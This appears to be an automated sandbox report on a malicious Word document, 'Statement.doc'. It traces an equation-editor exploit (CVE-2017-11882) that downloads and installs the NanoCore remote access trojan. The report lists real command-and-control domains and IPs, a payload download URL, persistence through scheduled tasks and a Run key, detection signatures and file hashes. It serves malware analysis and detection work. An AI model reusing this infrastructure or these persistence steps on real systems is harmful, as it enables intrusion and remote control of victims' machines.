        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: JNM.exe, 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: JNM.exe, 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: JNM.exe, 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: JNM.exe, 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2357133398.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 1692, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2304, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: JNM.exe PID: 2360, type: MEMORY
        Source: Yara matchFile source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Process Injection112Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsScheduled Task/Job1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSecurity Software Discovery311SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSVirtualization/Sandbox Evasion13Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol112Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 345151 Sample: Statement.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 63 Multi AV Scanner detection for domain / URL 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 14 other signatures 2->69 8 EQNEDT32.EXE 1 2->8         started        13 taskeng.exe 1 2->13         started        15 WINWORD.EXE 336 19 2->15         started        17 EQNEDT32.EXE 2->17         started        process3 dnsIp4 59 manojvashanava234.sytes.net 84.38.135.158, 49165, 80 DATACLUBLV Latvia 8->59 51 C:\Users\user\AppData\Roaming\JNM.exe, PE32 8->51 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->81 19 JNM.exe 1 8->19         started        22 smtpsvc.exe 1 13->22         started        24 JNM.exe 1 13->24         started        file5 signatures6 process7 signatures8 71 Multi AV Scanner detection for dropped file 19->71 73 Machine Learning detection for dropped file 19->73 75 Hides threads from debuggers 19->75 77 Contains functionality to hide a thread from the debugger 19->77 26 JNM.exe 1 9 19->26         started        31 cmd.exe 19->31         started        79 Injects a PE file into a foreign processes 22->79 33 cmd.exe 22->33         started        35 smtpsvc.exe 22->35         started        37 cmd.exe 24->37         started        39 JNM.exe 24->39         started        process9 dnsIp10 61 dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu 46.243.219.32, 2420 FISHNET-ASRU Netherlands 26->61 53 C:\Program Files (x86)\...\smtpsvc.exe, PE32 26->53 dropped 55 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 26->55 dropped 57 C:\Users\user\AppData\Local\...\tmp6D54.tmp, XML 26->57 dropped 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->83 41 schtasks.exe 26->41         started        43 schtasks.exe 26->43         started        45 timeout.exe 31->45         started        47 timeout.exe 33->47         started        49 timeout.exe 37->49         started        file11 signatures12 process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Statement.doc45%VirustotalBrowse
        Statement.doc59%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\JNM.exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe35%ReversingLabsByteCode-MSIL.Trojan.Generic
        C:\Users\user\AppData\Roaming\JNM.exe35%ReversingLabsByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        26.2.smtpsvc.exe.400000.1.unpack100%AviraHEUR/AGEN.1108376Download File
        7.2.JNM.exe.630000.3.unpack100%AviraTR/NanoCore.fadteDownload File
        7.2.JNM.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File
        23.2.JNM.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

        Domains

        SourceDetectionScannerLabelLink
        manojvashanava234.sytes.net11%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://manojvashanava234.sytes.net/WAH.exe10%VirustotalBrowse
        http://manojvashanava234.sytes.net/WAH.exe0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        dmjncbzvayuywqalponmcbvzcxhyuesgfhdnautwm.ydns.eu
        		46.243.219.32
        		truetrue
          		unknown
          manojvashanava234.sytes.net
          		84.38.135.158
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://manojvashanava234.sytes.net/WAH.exetrue
          • 10%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.%s.comPAJNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.JNM.exe, 00000003.00000002.2364935179.0000000006420000.00000002.00000001.sdmp, JNM.exe, 00000007.00000002.2361274784.0000000005760000.00000002.00000001.sdmp, taskeng.exe, 0000000D.00000002.2356083438.0000000001BE0000.00000002.00000001.sdmp, JNM.exe, 0000000F.00000002.2363821875.00000000064C0000.00000002.00000001.sdmpfalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            84.38.135.158
            		unknownLatvia
            		52048DATACLUBLVtrue
            46.243.219.32
            		unknownNetherlands
            		43317FISHNET-ASRUtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:345151
            Start date:27.01.2021
            Start time:19:11:33
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 12s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Statement.doc
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winDOC@32/13@16/2
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 157
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .doc
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            19:12:40API Interceptor235x Sleep call for process: EQNEDT32.EXE modified
            19:12:42API Interceptor1881x Sleep call for process: JNM.exe modified
            19:12:49Task SchedulerRun new task: SMTP Service path: "C:\Users\user\AppData\Roaming\JNM.exe" s>$(Arg0)
            19:12:49API Interceptor2x Sleep call for process: schtasks.exe modified
            19:12:49AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            19:12:50API Interceptor427x Sleep call for process: taskeng.exe modified
            19:12:51Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
            19:12:52API Interceptor218x Sleep call for process: smtpsvc.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            84.38.135.158Quote Requirement.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe
            New order.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/CIC.exe
            Quote Requirement.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe
            PMTI000021.docGet hashmaliciousBrowse
            • manojvashanava234.sytes.net/OSE.exe

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            manojvashanava234.sytes.netQuote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            New order.docGet hashmaliciousBrowse
            • 84.38.135.158
            Quote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            PMTI000021.docGet hashmaliciousBrowse
            • 84.38.135.158

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            DATACLUBLVQuote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            New order.docGet hashmaliciousBrowse
            • 84.38.135.158
            Quote Requirement.docGet hashmaliciousBrowse
            • 84.38.135.158
            PMTI000021.docGet hashmaliciousBrowse
            • 84.38.135.158
            PO 10834.exeGet hashmaliciousBrowse
            • 46.183.220.113
            https://gfifaxmakeronline.cmail19.com/t/t-l-xhjmc-glrjkydlk-r/Get hashmaliciousBrowse
            • 109.248.150.119
            qWuT75h3FNx6Mbp.exeGet hashmaliciousBrowse
            • 46.183.218.199
            New Sales.exeGet hashmaliciousBrowse
            • 84.38.134.123
            Kabg6OuIx3R.exeGet hashmaliciousBrowse
            • 84.38.134.114
            http://46.183.222.25/LVS7Kabg6OuIx3R.exeGet hashmaliciousBrowse
            • 46.183.222.25
            DIL-Statement Overdues & Listed Invoice-August 2020.exeGet hashmaliciousBrowse
            • 84.38.135.151
            Scan_17-08-2020 AFSLC INV#0002932.exeGet hashmaliciousBrowse
            • 84.38.135.151
            New_ Order0608202023838494575859445.exeGet hashmaliciousBrowse
            • 84.38.130.164
            ORDER.exeGet hashmaliciousBrowse
            • 84.38.130.164
            Scan_Docs #INV 300489739-04-08-2020 Amended.exeGet hashmaliciousBrowse
            • 84.38.135.151
            o3vcAB1r3E.exeGet hashmaliciousBrowse
            • 46.183.222.16
            Scan_SOA Updated June 2020--06-29-reconciled_.exeGet hashmaliciousBrowse
            • 84.38.135.151
            1.12.2018.jsGet hashmaliciousBrowse
            • 46.183.218.82
            invoice-00976.pdfGet hashmaliciousBrowse
            • 46.183.222.166
            46MON.exeGet hashmaliciousBrowse
            • 46.183.220.71

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\SMTP Service\smtpsvc.exe
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1973760
            Entropy (8bit):2.849298578285801
            Encrypted:false
            SSDEEP:1536:FNn93XOcZPdE8u+6zQc/jLsAngk98QjHBxo:z93ecZC8u+68c/7986
            MD5:10D30AD1922421E73E133AD020DF424F
            SHA1:7AB820DC29537EBAADB2D04C2F8B6F246CB8F24A
            SHA-256:79D73D305E1A52C157868E9F0305AE5E6AEBB28E43D360334C118FC1640A5B2C
            SHA-512:72E98B506476EE511D54D0F676FE559C603DD688D5C56B43A124D2D1A712561CD97236CACFE9DC064E416537CA717C2D207F0B4A123CCFA1E966372D8F642A8A
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 35%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9.`............................^8... ...@....@.. .......................`............@..................................8..K............................@....................................................... ............... ..H............text...d.... ...................... ..`.reloc.......@......................@..B........................................................@8......H........R..`............................................................*. ....*.....90...(....9........r`..p....(C...(D...*........(E...*....**....(_...*..0.._.......(....(....(....(....(....(....(....(....(....(....(...............(....(....(...............(....(....(...............(....(....(....(....(~...(}...(|...({...(z...(y...(x...(w...(v...(u...(t...(s...(r...(q...(p...(o...(n..............(m...(l...(k..............(j...(i...(h..............(g...(f...(e..............
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68A17DB9.wmf
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
            Category:dropped
            Size (bytes):180
            Entropy (8bit):2.943359370448092
            Encrypted:false
            SSDEEP:3:2lZlyll6/lollvlgiolog/lLneVOoEXaQNGbV91/l/eXavt/2mcll/l:2lb2oto90ogtqAozQNGbVPQXC1BUl/l
            MD5:3333D3D30CCB3D52656081D7983431F0
            SHA1:5AD6B35F57CEBB82EDC05BEA33C48D9B182B72CE
            SHA-256:58E99AEC6AA8488A9B78EE75D93B1FA64B686DE0006E179DEB084FF862CCBCAB
            SHA-512:6C8F2CF6460E61542D2A8E47A79BA194D5DC847E8E89C7CC143720C11CAB2BCB6E9A132C14A999CD1BA2587CF31ED0C76997564A64F47AA355698D408EE98F90
            Malicious:false
            Preview: .......................................................................... . .....&...................................&.....MathType..P.....&...........................Q...........
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.8712130487472628
            Encrypted:false
            SSDEEP:6:44pwwNgREqAWlgFJpDlll8vlwpbRFwQFrB:vpdk5uFJp7uvqptKQZB
            MD5:F587AA2B21B6793637195CA6AD3AFF62
            SHA1:B28141557E577082F740B9F6EE9E4D1AD51741B3
            SHA-256:B93ABC1DEB43D1FBD06F94A37B28BF2CC4F3AD7A666A9F46BF09304E440107A1
            SHA-512:CF2CC9197CD6518C8498118597BC3400A04E00CD03702E799D01E829039603B7EF077B6AA40D2F6A3FD5FC4240D2B7ED3C7E4B9E77FB1CCF1EE8C535954831DE
            Malicious:false
            Preview: a.n.s.i.6.4.5.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j.9.c...CJ..OJ..QJ..U..^J..aJ.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55454834-8E09-401E-A760-1A1C7B299BE3}.tmp
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Temp\tmp5A32.tmp
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1310
            Entropy (8bit):5.1063907901076036
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
            MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
            SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
            SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
            SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
            Malicious:false
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Local\Temp\tmp6D54.tmp
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1301
            Entropy (8bit):5.105807939032916
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK01xtn:cbk4oL600QydbQxIYODOLedq3Mj
            MD5:E2E1F2413B11C7C1D1A56333B80F7094
            SHA1:34C94BE675B0741BFC81E19599597F6C54C3DF2B
            SHA-256:EE1E3555090011DA7680ED21F6428CDC078D5808C1E702C9375F3771C247093A
            SHA-512:473462E626DEAF58E8A94D27A0B78634F6358CE842F6946A5C34831CCB976BB2681643C674F4413AC86F4A57B5B988750AFEB0C8D5620BCBDB938A769565840D
            Malicious:true
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:Non-ISO extended-ASCII text, with no line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:3:m9tn:m9t
            MD5:0039F8C444DA3D4473B68D9BCBE67956
            SHA1:DFADD58D8BCC00441089D7E50B6680F6ADE59708
            SHA-256:E4E991B189A88F18F21C4BBF6E70AC805CAE23C195822E68124F7E412945E635
            SHA-512:D81B1BC62638CE8029BB589A4AA977A598DAA2D6CE014AF10EF58D85076BE63D4E5F094EE4B1E473DBBB3E1C9EF8861FD90BC1877884715026BF37BC1B6CFB82
            Malicious:true
            Preview: .8.:..H
            C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
            Process:C:\Users\user\AppData\Roaming\JNM.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):38
            Entropy (8bit):4.461761645524449
            Encrypted:false
            SSDEEP:3:oNXp4EaKC5z9A:oNPaZ5W
            MD5:8631085785FF73C31973E2E860CF2323
            SHA1:90270C28AA4C410258DD47311574F316DBCC846C
            SHA-256:3F07927E5440E7853B9BE8E6EC4A8183AE09D75FBFF58817750058224B888FD9
            SHA-512:B60AA085CE40A555CF7A3F4FDF37AB3AB916480010499478EE1BD79EC5978E1057FC09A44D92E8BA2B4D660011D0554B3485B66C90536C738AFE2A278ED511DB
            Malicious:false
            Preview: C:\Users\user\AppData\Roaming\JNM.exe
